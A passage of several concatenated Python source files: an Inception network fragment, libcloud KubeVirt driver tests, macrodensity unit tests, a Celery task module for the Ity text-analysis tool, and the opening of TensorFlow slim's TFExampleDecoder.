inception_setting, layer_name): weights, biases = self.create_inception_variables(inception_setting, layer_name) conv_1x1 = self.conv_layer_with_relu(model, weights['conv_1x1_1'], biases['conv_1x1_1'], 1) conv_3x3 = self.conv_layer_with_relu(model, weights['conv_1x1_2'], biases['conv_1x1_2'], 1) conv_3x3 = self.conv_layer_with_relu(conv_3x3, weights['conv_3x3'], biases['conv_3x3'], 1) conv_5x5 = self.conv_layer_with_relu(model, weights['conv_1x1_3'], biases['conv_1x1_3'], 1) conv_5x5 = self.conv_layer_with_relu(conv_5x5, weights['conv_5x5'], biases['conv_5x5'], 1) conv_pool = self.max_pool(model, 3, 1) conv_pool = self.conv_layer_with_relu(conv_pool, weights['conv_pool'], biases['conv_pool'], 1) final_model = tf.concat([conv_1x1, conv_3x3, conv_5x5, conv_pool], 3) return final_model def create_inception_variables(self, inception_setting, layer_name): model_dim = inception_setting.model_dim conv_1x1_1_w, conv_1x1_1_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_1x1_1_layers], layer_name + '-conv_1x1_1') conv_1x1_2_w, conv_1x1_2_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_1x1_2_layers], layer_name + '-conv_1x1_2') conv_1x1_3_w, conv_1x1_3_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_1x1_3_layers], layer_name + '-conv_1x1_3') conv_3x3_w, conv_3x3_b = self.create_conv_vars([3, 3, inception_setting.conv_1x1_2_layers, inception_setting.conv_3x3_layers], layer_name + '-conv_3x3') conv_5x5_w, conv_5x5_b = self.create_conv_vars([5, 5, inception_setting.conv_1x1_3_layers, inception_setting.conv_5x5_layers], layer_name + '-conv_5x5') conv_pool_w, conv_pool_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_pool_layers], layer_name + '-conv_pool') weights = { 'conv_1x1_1': conv_1x1_1_w, 'conv_1x1_2': conv_1x1_2_w, 'conv_1x1_3': conv_1x1_3_w, 'conv_3x3': conv_3x3_w, 'conv_5x5': conv_5x5_w, 'conv_pool': conv_pool_w } biases = { 'conv_1x1_1': conv_1x1_1_b, 'conv_1x1_2': conv_1x1_2_b, 'conv_1x1_3': conv_1x1_3_b, 'conv_3x3': conv_3x3_b, 'conv_5x5': conv_5x5_b, 'conv_pool': conv_pool_b } return weights, biases def auxiliary_classifier(self, model, input_size, name): aux_classifier = self.avg_pool(model, 5, 3, 'VALID') conv_weight, conv_bias = self.create_conv_vars([1, 1, input_size, input_size], name + '-conv_1x1') aux_classifier = self.conv_layer_with_relu(aux_classifier, conv_weight, conv_bias, 1) fc_weight, fc_bias = self.create_fc_vars([4*4*input_size, self.nclasses], name + '-fc') aux_classifier = self.fully_connect(aux_classifier, fc_weight, fc_bias) aux_classifier = tf.nn.dropout(aux_classifier, 0.7) return aux_classifier def conv_layer_with_relu(self, model, weights, biases, stride_size, padding='SAME'): new_model = tf.nn.conv2d(model, weights, strides=[1, stride_size, stride_size, 1], padding=padding) new_model = tf.nn.bias_add(new_model, biases) new_model = tf.nn.relu(new_model) return new_model def max_pool(self, model, kernal_size, stride_size, padding='SAME'): new_model = tf.nn.max_pool(model, ksize=[1, kernal_size, kernal_size, 1], strides=[1, stride_size, stride_size, 1], padding=padding) return new_model def avg_pool(self, model, kernal_size, stride_size, padding='SAME'): new_model = tf.nn.avg_pool(model, ksize=[1, kernal_size, kernal_size, 1], strides=[1, stride_size, stride_size, 1], padding=padding) return new_model def fully_connect(self, model, weights, biases): fc_model = tf.reshape(model, [-1, weights.get_shape().as_list()[0]]) fc_model = tf.matmul(fc_model, weights) fc_model = tf.add(fc_model, biases) fc_model = tf.nn.relu(fc_model) return fc_model def create_conv_vars(self, size, name): weight = self.create_weight(size, name + '_W') bias = self.create_bias(size[3], name + '_b') return weight, bias def create_fc_vars(self, size, name): weight = self.create_weight(size, name + '_W') bias = self.create_bias(size[1], name + '_b') return weight, bias def create_weight(self, size, name): weight = tf.get_variable(name, size, initializer=tf.contrib.layers.xavier_initializer()) return weight def create_bias(self, size, name): bias = tf.get_variable(name, [size], initializer=tf.constant_initializer(0.2)) return bias class InceptionSettings(): def __init__(self, model_dim, inception_settings): self.model_dim = model_dim self.conv_1x1_1_layers = inception_settings[0][0] self.conv_1x1_2_layers = inception_settings[1][0] self.conv_1x1_3_layers = inception_settings[2][0] self.conv_3x3_layers = inception_settings[1][1] self.conv_5x5_layers = inception_settings[2][1] self.conv_pool_layers = inception_settings[3][0]
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys from libcloud.compute.drivers.kubevirt import KubeVirtNodeDriver from libcloud.compute.types import NodeState from libcloud.utils.py3 import httplib from libcloud.test import unittest from libcloud.test import MockHttp from libcloud.test.common.test_kubernetes import KubernetesAuthTestCaseMixin from libcloud.test.file_fixtures import ComputeFileFixtures class KubeVirtTestCase(unittest.TestCase, KubernetesAuthTestCaseMixin): driver_cls = KubeVirtNodeDriver fixtures = ComputeFileFixtures('kubevirt') def setUp(self): KubeVirtNodeDriver.connectionCls.conn_class = KubeVirtMockHttp self.driver = KubeVirtNodeDriver(key='user', secret='pass', secure=True, host='foo', port=6443) def test_list_locations(self): locations = self.driver.list_locations() self.assertEqual(len(locations), 5) self.assertEqual(locations[0].name, 'default') self.assertEqual(locations[1].name, 'kube-node-lease') self.assertEqual(locations[2].name, 'kube-public') self.assertEqual(locations[3].name, 'kube-system') namespace4 = locations[0].driver.list_locations()[4].name self.assertEqual(namespace4, 'kubevirt') id4 = locations[2].driver.list_locations()[4].id self.assertEqual(id4, 'e6d3d7e8-0ee5-428b-8e17-5187779e5627') def test_list_nodes(self): nodes = self.driver.list_nodes() id0 = "74fd7665-fbd6-4565-977c-96bd21fb785a" self.assertEqual(len(nodes), 1) self.assertEqual(nodes[0].extra['namespace'], 'default') valid_node_states = {NodeState.RUNNING, NodeState.PENDING, NodeState.STOPPED} self.assertTrue(nodes[0].state in valid_node_states) self.assertEqual(nodes[0].name, 'testvm') self.assertEqual(nodes[0].id, id0) def test_destroy_node(self): nodes = self.driver.list_nodes() to_destroy = nodes[-1] resp = self.driver.destroy_node(to_destroy) self.assertTrue(resp) def test_start_node(self): nodes = self.driver.list_nodes() r1 = self.driver.start_node(nodes[0]) self.assertTrue(r1) def test_stop_node(self): nodes = self.driver.list_nodes() r1 = self.driver.stop_node(nodes[0]) self.assertTrue(r1) def test_reboot_node(self): nodes = self.driver.list_nodes() for node in nodes: if node.name == "testvm": resp = self.driver.reboot_node(node) self.assertTrue(resp) class KubeVirtMockHttp(MockHttp): fixtures = ComputeFileFixtures('kubevirt') def _api_v1_namespaces(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('_api_v1_namespaces.json') else: raise AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_default_vms.json') resp = httplib.OK elif method == "POST": body = self.fixtures.load('create_vm.json') resp = httplib.CREATED else: AssertionError('Unsupported method') return (resp, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_kube_node_lease_virtualmachines(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_kube_node_lease_vms.json') elif method == "POST": pass else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_kube_public_virtualmachines(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_kube_public_vms.json') elif method == "POST": pass else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_kube_system_virtualmachines(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_kube_system_vms.json') elif method == "POST": pass else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_kubevirt_virtualmachines(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_kube_public_vms.json') elif method == "POST": pass else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_testvm(self, method, url, body, headers): header = "application/merge-patch+json" data_stop = {"spec": {"running": False}} data_start = {"spec": {"running": True}} if method == "PATCH" and headers['Content-Type'] == header and body == data_start: body = self.fixtures.load('start_testvm.json') elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop: body = self.fixtures.load('stop_testvm.json') else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_vm_cirros(self, method, url, body, headers): header = "application/merge-patch+json" data_stop = {"spec": {"running": False}} data_start = {"spec": {"running": True}} if method == "PATCH" and headers['Content-Type'] == header and body == data_start: body = self.fixtures.load('start_vm_cirros.json') elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop: body = self.fixtures.load('stop_vm_cirros.json') else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachineinstances_testvm(self, method, url, body, headers): if method == "DELETE": body = self.fixtures.load('delete_vmi_testvm.json') else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _api_v1_namespaces_default_pods(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_pods.json') else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _api_v1_namespaces_default_services(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_services.json') else: AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if __name__ == '__main__': sys.exit(unittest.main())
from __future__ import print_function import unittest import sys import os import numpy as np import macrodensity as md import pkg_resources from os.path import join as path_join try: import pandas has_pandas = True except ImportError: has_pandas = False test_dir = os.path.abspath(os.path.dirname(__file__)) class TestDensityReadingFunctions(unittest.TestCase): ''' Test the code for reading in charge and density files''' def test_read_vasp(self): '''Test the function for reading CHGCAR/LOCPOT''' chgcar = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) charge, ngx, ngy, ngz, lattice = md.read_vasp_density(chgcar, quiet=True) for v, t in ((charge, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(charge[0], -.76010173913E+01) self.assertEqual(charge[56 * 56 * 56 -1], -4.4496715627) self.assertEqual(lattice[0, 0], 2.7150000) self.assertEqual(ngx, 56) def test_read_vasp_parchg(self): '''Test the function for reading CHGCAR/LOCPOT''' parchg = pkg_resources.resource_filename( __name__, path_join('..', 'PARCHG.test')) spin, ngx, ngy, ngz, lattice = md.read_vasp_parchg(parchg, quiet=True) for v, t in ((spin, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(spin[0], 1.0) self.assertEqual(lattice[0, 0], 11.721852) spin, ngx, ngy, ngz, lattice = md.read_vasp_parchg(parchg, spin=True, quiet=True) for v, t in ((spin[0], np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) for v, t in ((spin[1], np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(spin[1][0], 0.0) def test_read_gulp(self): '''Test the function for reading GULP output''' gulpcar = pkg_resources.resource_filename( __name__, path_join('../examples', 'gulp.out')) potential, ngx, ngy, ngz, lattice = md.read_gulp_potential(gulpcar) for v, t in ((potential, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(potential[0], 8.732207) self.assertEqual(potential[10 * 10 * 20 -1], 8.732207) self.assertEqual(lattice[0, 0], 11.996500) self.assertEqual(ngx, 10) def test_density_2_grid(self): '''Test the function for projecting the potential onto a grid''' chgcar = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) charge, ngx, ngy, ngz, lattice = md.read_vasp_density(chgcar, quiet=True) grid_pot, electrons = md.density_2_grid(charge, ngx, ngy, ngz) self.assertAlmostEqual(grid_pot[0, 0, 0], - .76010173913E+01) self.assertAlmostEqual(grid_pot[55, 55, 55], -4.4496715627) self.assertAlmostEqual(electrons, 8.00000, places=4) @unittest.skipIf(not has_pandas, "Already using pandas-free reader") class TestDensityReadingFunctionsNoPandas(TestDensityReadingFunctions): """Disable Pandas and test code for reading charge and density files""" def setUp(self): self._pandas = sys.modules['pandas'] sys.modules['pandas'] = None def tearDown(self): sys.modules['pandas'] = self._pandas class TestOtherReadingFunctions(unittest.TestCase): def test_read_vasp_classic(self): '''Test the function for reading CHGCAR/LOCPOT''' chgcar = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) (charge, ngx, ngy, ngz, lattice) = md.read_vasp_density_classic(chgcar) for v, t in ((charge, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(charge[0], -.76010173913E+01) self.assertEqual(charge[56 * 56 * 56 -1], -4.4496715627) self.assertEqual(lattice[0, 0], 2.7150000) self.assertEqual(ngx, 56) def test_matrix_2_abc(self): '''Test conversion of lattice to abc, alpha, beta, gamma format''' lattice = np.asarray([[2.715, 2.715, 0.], [0., 2.715, 2.715], [2.715, 0., 2.715]]) a, b, c, a_vec, b_vec, c_vec = md.matrix_2_abc(lattice) self.assertAlmostEqual(a, 3.8395898218429529) self.assertAlmostEqual(b, 3.8395898218429529) self.assertAlmostEqual(c, 3.8395898218429529) class TestAveragingFunctions(unittest.TestCase): '''Test various functions for manipulating and measuring the density''' def test_planar_average(self): ''' Test the code for averaging the density''' test_grid = np.zeros(shape=(3, 3, 3)) for i in range(3): test_grid[i, :, 0] = float(i) planar = md.planar_average(test_grid, 3, 3, 3) self.assertAlmostEqual(planar[0], 1.0) planar = md.planar_average(test_grid, 3, 3, 3, axis='x') self.assertAlmostEqual(planar[2], 0.66666667) def test_volume_average(self): '''Test the volume_average function''' test_grid = np.zeros(shape=(5, 5, 5)) for i in range(5): for j in range(5): for k in range(5): test_grid[i, j, k] = float(i * j * k) potential, variance = md.volume_average([0, 0, 0], [2, 2, 2], test_grid, 5, 5, 5) self.assertAlmostEqual(potential, 0.125) self.assertAlmostEqual(variance, 0.109375) potential, variance = md.volume_average([1, 1, 1], [2, 2, 2], test_grid, 5, 5, 5) potential, variance = md.volume_average([1, 1, 1], [3, 3, 3], test_grid, 5, 5, 5) self.assertAlmostEqual(potential, 1.0) self.assertAlmostEqual(variance, 3.6296296296296298) def test_ipr(self): '''Test the ipr function''' parchg = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) dens, ngx, ngy, ngz, lattice = md.read_vasp_density(parchg, quiet=True) self.assertAlmostEqual(md.inverse_participation_ratio(dens), 1.407e-5) class TestGeometryFunctions(unittest.TestCase): '''Test the functions that do geometry and trig''' def test_gradient_magnitude(self): '''Test the function for returning the magnitude of gradient at a voxel''' grid = np.zeros(shape=(3, 3, 3)) for i in range(3): for j in range(3): for k in range(3): grid[i, j, k] = i * j * k gx, gy, gz = np.gradient(grid) magnitudes = md.gradient_magnitude(gx, gy, gz) self.assertEqual(magnitudes[1, 1, 1], 1.7320508075688772) self.assertEqual(magnitudes[2, 2, 2], 6.9282032302755088) def test_macroscopic_average(self): '''Test the macroscopic averaging function''' f = 2. fs = 100 x = np.arange(fs) potential = [np.sin(2 * np.pi * f * (i/float(fs))) for i in np.arange(fs)] macro = md.macroscopic_average(potential, 50, 1) self.assertAlmostEqual(macro[20], 0.) def test_vector_2_abscissa(self): ''' Test the vector_2_abscissa function''' abscissa = md.vector_2_abscissa([5, 6, 7], 10, 0.2, 0.2, 0.2) self.assertEqual(abscissa[5], 10.488088481701517) def test_number_in_field(self): '''Test the number_in_field function''' test_field = np.zeros(shape=(5, 5, 5)) test_field[0, 0, 0] = 1. test_field[4, 4, 4] = 1. test_field[2, 3, 2] = 0.5 test_field[1, 4, 2] = 0.3 self.assertEqual(md.number_in_field(test_field, 0.3), 4) self.assertEqual(md.number_in_field(test_field, 0.5), 3) self.assertEqual(md.number_in_field(test_field, 1.0), 2) self.assertEqual(md.number_in_field(test_field, 1.1), 0) def test_element_vol(self): '''Test the element_vol function''' self.assertEqual(md.element_vol(3000.,10, 20, 30), 0.5) def test_get_volume(self): '''Test the get_volume function''' a = [5.43 * 0.5, 0., 5.43 * 0.5] b = [5.43 * 0.5, 5.43 * 0.5, 0.] c = [0., 5.43 * 0.5, 5.43 * 0.5] self.assertAlmostEqual(md.get_volume(a, b, c), 40.03, places=2) def test_numbers_2_grid(self): '''Tests the numbers_2_grid function''' a = md.numbers_2_grid([0.5, 0.5, 0.5], 10, 10, 10) b = [5, 5, 5] self.assertSequenceEqual(a.tolist(), b) def test_GCD(self): '''Test the GCD function''' self.assertEqual(md.GCD(100,12), 4) def test_GCD_List(self): '''Tests the GCD_List function''' self.assertEqual(md.GCD_List([15,100,45]), 5) if __name__ == '__main__': unittest.main()
# coding=utf-8 from __future__ import absolute_import import os import sys sys.path.append(os.path.join( os.path.dirname(os.path.basename(__file__)), ".." )) sys.path.append(os.path.dirname(__file__)) from collections import OrderedDict import codecs import json import hashlib # Ity Imports import Ity from Ity.Utilities import Corpus, CorpusText from Ity.TaskSupport import * # Celery from celery import Celery from celery.utils.log import get_task_logger celery_app = Celery(__name__) celery_app.config_from_object("celery_config") logger = get_task_logger(__name__) # Sentry / Raven if "SENTRY_DSN" in celery_app.conf: from raven import Client from raven.contrib.celery import register_signal client = Client( dsn=celery_app.conf["SENTRY_DSN"] ) register_signal(client) @celery_app.task def upload_corpus(data): pass @celery_app.task def process_corpus( tokenizer="RegexTokenizer", taggers=("DocuscopeTagger",), formatters=("HTMLFormatter",), corpus_formatters=("CSVFormatter",), **corpus_kwargs ): """ Processes an entire corpus of texts, given a path to them, using a certain tokenizer, taggers, formatters, and corpus formatters. Additional arguments include "path", "output_path" and more--- please refer to init method of the Ity.Utilities.Corpus class. By the way, while the `formatters` operate on single texts with their format() method, `corpus_formatters` operate on the entire corpus with their batch_format() method. That's the distinction. The `tokenizer` argument, as well as **any tuple item** in the `taggers`, `formatters`, or `corpus_formatters` arguments may be one of the following: * A **str** equal to the name of an appropriate Ity class, i.e. `tokenizer="RegexTokenizer"`, `taggers=("DocuscopeTagger", "CSVTagger")` * An appropriate **class** that has been imported, i.e. `tokenizer=RegexTokenizer`, `taggers=(DocuscopeTagger, CSVTagger)` * An **instance** of an appropriate Ity class, i.e. `tokenizer=my_tokenizer`, `taggers=(first_tagger, second_tagger)` You may process texts in a corpus with multiple taggers and formatters, but may only use one tokenizer; the rest of the modules up the chain have to agree on *something*, right? :param tokenizer: A str, an Ity Tokenizer class, or an Ity Tokenizer instance. :param taggers: A tuple of strs, Ity Tagger classes, or Ity Taggers instances. :param formatters: A tuple of strs, Ity Formatter classes, or Ity Formatter instances. :param corpus_formatters: A tuple of strs, Ity Formatter classes, or Ity Formatter instances. :param corpus_kwargs: Keyword arguments to be passed to the Ity.Utilities.Corpus init() method: `path`, `output_path`, etc. :return: """ corpus = Corpus(**corpus_kwargs) # Take the tokenizer, taggers, formatters, and batch_formatters arguments # and initialize whatever modules we need. tokenizer = init_tokenizer(tokenizer) taggers = [ init_tagger(tagger) for tagger in taggers ] formatters = [ init_formatter(formatter) for formatter in formatters ] corpus_formatters = [ init_formatter(corpus_formatter) for corpus_formatter in corpus_formatters ] # Process each text in the corpus. results = OrderedDict() for name, path in corpus.texts.items(): results[name] = process_text( path=path, tokenizer=tokenizer, taggers=taggers, formatters=formatters, corpus_instance=corpus ) # Use some of the results to generate output with the corpus_formatters. # for corpus_formatter in corpus_formatters: corpus_results = None return corpus, results, corpus_results @celery_app.task def process_text( path, name=None, tokenizer="RegexTokenizer", taggers=("DocuscopeTagger",), formatters=("StaticHTMLFormatter",), corpus_instance=None, save=("format_data",), save_to_disk=True ): """ Given a path to a text file, process a text using Ity. """ if save is None or ( "text_str" not in save and "tokens" not in save and "rules" not in save and "tags" not in save and "formats" not in save ): raise ValueError("We're not supposed to save any data? Why are we even generating it, then?") # Create a CorpusText instance for this text file. text_instance = CorpusText(path, name=name, corpus=corpus_instance) # Prep the Ity modules for processing. # This is going to look a little weird: "didn't you initialize the modules # in process_corpus()?" # Yes, we did. the init_tokenizer(), init_tagger(), and init_formatter() # functions all check to see if the input is already an instance. If they # get a str or a class instead, they'll do the right thing! tokenizer = init_tokenizer(tokenizer) taggers = [ init_tagger(tagger) for tagger in taggers ] formatters = [ init_formatter(formatter) for formatter in formatters ] # Tokenize the text content. text_instance.tokens = tokenize_text(text_instance.text_str, tokenizer) # Tag this text with the specified Tagger classes. for tagger_index, tagger in enumerate(taggers): # Raise an exception if we're tagging a second time with [effectively] # the exact same tagger---all the same settings that matter and such. # (This is why it's important to make sure that Ity modules provide # a precise full_label properties.) if tagger.full_label in text_instance.tag_data: raise ValueError("Needlessly tagging a text with an identically configured tagger for a second time: %s" % tagger.full_label) rules, tags = tag_tokens(text_instance.tokens, tagger) # Append a dict of information from this tagger. text_instance.tag_data[tagger.full_label] = { "tags": tags, "rules": rules, "label": tagger.label, "full_label": tagger.full_label } # Format each tagged output for this text with the specified Formatter classes. for formatter_index, formatter in enumerate(formatters): # Raise an exception if we're formatting a second time with # [effectively] the exact same formatter---all the same settings # that matter and such. if formatter.full_label in text_instance.format_data: raise ValueError("Needlessly formatting a text with an identically configured formatter for a second time: %s" % tagger.full_label) # tagger_instance.tag_data may contain the output of multiple taggers. # The format_text() function will generate a separate output for each tagger. # Also, note that we're not passing the format_text() function the # text_str or tokens arguments because we're passing it a CorpusText # instance, which has been previously updated above to contain the # text's tokens and tag_data. Additionally, the text_str property # provides the text file's contents. text_instance.format_data = format_text( text_instance=text_instance, # Contains tokens, text_str, and tag_data for one or more taggers formatter=formatter, save_to_disk=save_to_disk and "formats" in save ) # Return ONLY the processed text results we want by way of the CorpusText instance. # This means we're going to clear out the stuff we weren't asked to save. # Conditionally add data to the return value. # TODO: Add support for writing certain Python data structures to disk (other than Formatters, which will be able to write to disk on their own.) if "metadata" not in save: text_instance.metadata = None if "text_str" not in save: text_instance._text_str = None if "tokens" not in save: text_instance.tokens = [] if "tag_data" not in save: text_instance.tag_data = {} if "format_data" not in save: text_instance.format_data = {} return text_instance @celery_app.task def get_text_str(text_path): with codecs.open(text_path, "r", encoding="utf-8") as text_file: text = text_file.read() return text @celery_app.task def tokenize_text(text, tokenizer="RegexTokenizer"): """ Tokenizes a text string. """ try: tokenizer_instance = init_tokenizer(tokenizer) except (ValueError, ImportError): raise ValueError("Invalid tokenizer module specified.") tokens = tokenizer_instance.tokenize(text) return tokens @celery_app.task def tag_tokens(tokens, tagger="DocuscopeTagger"): """ Tags a tuple of tokens. """ try: tagger_instance = init_tagger(tagger) except (ValueError, ImportError): raise ValueError("Invalid tagger module specified.") tags, tag_maps = tagger_instance.tag(tokens) return tags, tag_maps @celery_app.task def format_text( tags=None, rules=None, tokens=None, text_str=None, text_instance=None, formatter="StaticHTMLFormatter", save_to_disk=True ): # Try to get or otherwise instantiate the formatter module. try: formatter_instance = initialize_modules([formatter])[0] except (ValueError, ImportError): raise ValueError("Invalid tagger module specified.") # If we're saving the formatted output to disk, figure out where it's going. if not save_to_disk: output_path = None output_name = None else: if text_instance is not None and hasattr(text_instance, "output_path"): # This output path includes the text_instance name in it already. output_path = text_instance.output_path elif hasattr(text_instance, "corpus") and text_instance.corpus is not None and hasattr(text_instance.corpus, "output_path"): output_path = text_instance.corpus.output_path else: output_path = Ity.corpus_root # Okay, we have the output path, but how about the output filename? if text_instance is None or not hasattr(text_instance, "name"): # Generate a name, I guess. output_name = hashlib.sha1() output_path = os.path.join(output_path, output_name) # Actually call format()! format_output = formatter_instance.format( output_path=output_path, tags=tags, rules=rules, tokens=tokens, text_str=text_str ) return format_output @celery_app.task def get_output_dir(text=None, corpus=None): #TODO: Remove this. Blargh. output_dir = Ity.output_root if corpus is not None and hasattr(corpus, "name"): output_dir = os.path.join(output_dir, corpus.name) return output_dir @celery_app.task def initialize_modules(modules): initialized_modules = {} for module_index, module_kwargs in enumerate(modules): # Will this module instance be passed a `label` argument? if "label" not in module_kwargs: module_kwargs["label"] = module_index # Anyway, what kind of module is this supposed to be? module_instance = None if "tokenizer" in module_kwargs: module_instance = init_tokenizer(**module_kwargs) elif "tagger" in module_kwargs: module_instance = init_tagger(**module_kwargs) elif "formatter" in module_kwargs: module_instance = init_formatter(**module_kwargs) # We should definitely have an instantiated module by now. if module_instance is None: raise ValueError("Invalid Ity module specified: %s" % str(module_kwargs)) initialized_modules[module_instance.full_label] = module_instance return initialized_modules
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Contains the TFExampleDecoder its associated helper classes. The TFExampleDecode is a DataDecoder used to decode TensorFlow Example protos. In order to do so each requested item must be paired with one or more Example features that are parsed to produce the Tensor-based manifestation of the item. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc from tensorflow.contrib.slim.python.slim.data import data_decoder from tensorflow.python.framework import dtypes from tensorflow.python.framework import sparse_tensor from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import functional_ops from tensorflow.python.ops import image_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import parsing_ops from tensorflow.python.ops import sparse_ops class ItemHandler(object): """Specifies the item-to-Features mapping for tf.parse_example. An ItemHandler both specifies a list of Features used for parsing an Example proto as well as a function that post-processes the results of Example parsing. """ __metaclass__ = abc.ABCMeta def __init__(self, keys): """Constructs the handler with the name of the tf.Feature keys to use. See third_party/tensorflow/core/example/feature.proto Args: keys: the name of the TensorFlow Example Feature. """ if not isinstance(keys, (tuple, list)): keys = [keys] self._keys = keys @property def keys(self): return self._keys @abc.abstractmethod def tensors_to_item(self, keys_to_tensors): """Maps the given dictionary of tensors to the requested item. Args: keys_to_tensors: a mapping of TF-Example keys to parsed tensors. Returns: the final tensor representing the item being handled. """ pass class ItemHandlerCallback(ItemHandler): """An ItemHandler that converts the parsed tensors via a given function. Unlike other ItemHandlers, the ItemHandlerCallback resolves its item via a callback function rather than using prespecified behavior. """ def __init__(self, keys, func): """Initializes the ItemHandler. Args: keys: a list of TF-Example keys. func: a function that takes as an argument a dictionary from `keys` to parsed Tensors. """ super(ItemHandlerCallback, self).__init__(keys) self._func = func def tensors_to_item(self, keys_to_tensors): return self._func(keys_to_tensors) class BoundingBox(ItemHandler): """An ItemHandler that concatenates a set of parsed Tensors to Bounding Boxes. """ def __init__(self, keys=None, prefix=None): """Initialize the bounding box handler. Args: keys: A list of four key names representing the ymin, xmin, ymax, mmax prefix: An optional prefix for each of the bounding box keys. If provided, `prefix` is appended to each key in `keys`. Raises: ValueError: if keys is not `None` and also not a list of exactly 4 keys """ if keys is None: keys = ['ymin', 'xmin', 'ymax', 'xmax'] elif len(keys) != 4: raise ValueError('BoundingBox expects 4 keys but got {}'.format( len(keys))) self._prefix = prefix self._keys = keys self._full_keys = [prefix + k for k in keys] super(BoundingBox, self).__init__(self._full_keys) def tensors_to_item(self, keys_to_tensors): """Maps the given dictionary of tensors to a contatenated list of bboxes. Args: keys_to_tensors: a mapping of TF-Example keys to parsed tensors. Returns: [num_boxes, 4] tensor of bounding box coordinates, i.e. 1 bounding box per row, in order [y_min, x_min, y_max, x_max]. """ sides = [] for key in self._full_keys: side = array_ops.expand_dims(keys_to_tensors[key].values, 0) sides.append(side) bounding_box = array_ops.concat(sides, 0) return array_ops.transpose(bounding_box) class Tensor(ItemHandler): """An ItemHandler that returns a parsed Tensor.""" def __init__(self, tensor_key, shape_keys=None, shape=None, default_value=0): """Initializes the Tensor handler. Tensors are, by default, returned without any reshaping. However, there are two mechanisms which allow reshaping to occur at load time. If `shape_keys` is provided, both the `Tensor` corresponding to `tensor_key` and `shape_keys` is loaded and the former `Tensor` is reshaped with the values of the latter. Alternatively, if a fixed `shape` is provided, the `Tensor` corresponding to `tensor_key` is loaded and reshape appropriately. If neither `shape_keys` nor `shape` are provided, the `Tensor` will be returned without any reshaping. Args: tensor_key: the name of the `TFExample` feature to read the tensor from. shape_keys: Optional name or list of names of the TF-Example feature in which the tensor shape is stored. If a list, then each corresponds to one dimension of the shape. shape: Optional output shape of the `Tensor`. If provided, the `Tensor` is reshaped accordingly. default_value: The value used when the `tensor_key` is not found in a particular `TFExample`. Raises: ValueError: if both `shape_keys` and `shape` are specified. """ if shape_keys and shape is not None: raise ValueError('Cannot specify both shape_keys and shape parameters.') if shape_keys and not isinstance(shape_keys, list): shape_keys = [shape_keys] self._tensor_key = tensor_key self._shape_keys = shape_keys self._shape = shape self._default_value = default_value keys = [tensor_key] if shape_keys: 